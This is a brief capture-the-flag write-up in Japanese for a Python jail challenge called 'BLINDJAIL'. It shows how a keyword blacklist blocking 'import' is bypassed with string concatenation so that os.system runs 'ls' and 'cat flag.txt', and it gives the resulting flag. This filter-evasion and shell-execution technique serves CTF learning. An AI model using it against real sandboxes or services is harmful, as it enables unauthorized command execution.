There is no escape, sometimes going in blind makes other attributes stronger.
nc 34.100.177.188 1337
ncでの接続先が渡される。
$ nc 34.100.177.188 1337
-------------------------------------------------------------
WELCOME TO THE BLINDJAIL
--------------------------------------------------------
fret not that you cannot see, fret that you cannot leave.
>>> print(1)
1
>>> __import__("os").system("ls")
Nope, import is banned!
>>>pythonのjailのようだが、importなどいくつかのブラックリストがある。
このような場合、全角と文字列結合でバイパスする。
$ nc 34.100.177.188 1337
-------------------------------------------------------------
WELCOME TO THE BLINDJAIL
--------------------------------------------------------
fret not that you cannot see, fret that you cannot leave.
>>> __import__("o"+"s").system("ls")
flag.txt
main.py
>>> __import__("o"+"s").system("c"+"at f"+"lag.txt")
nitectf{sl1d3_0ver_th3se_4ttribut3s}flagが得られた。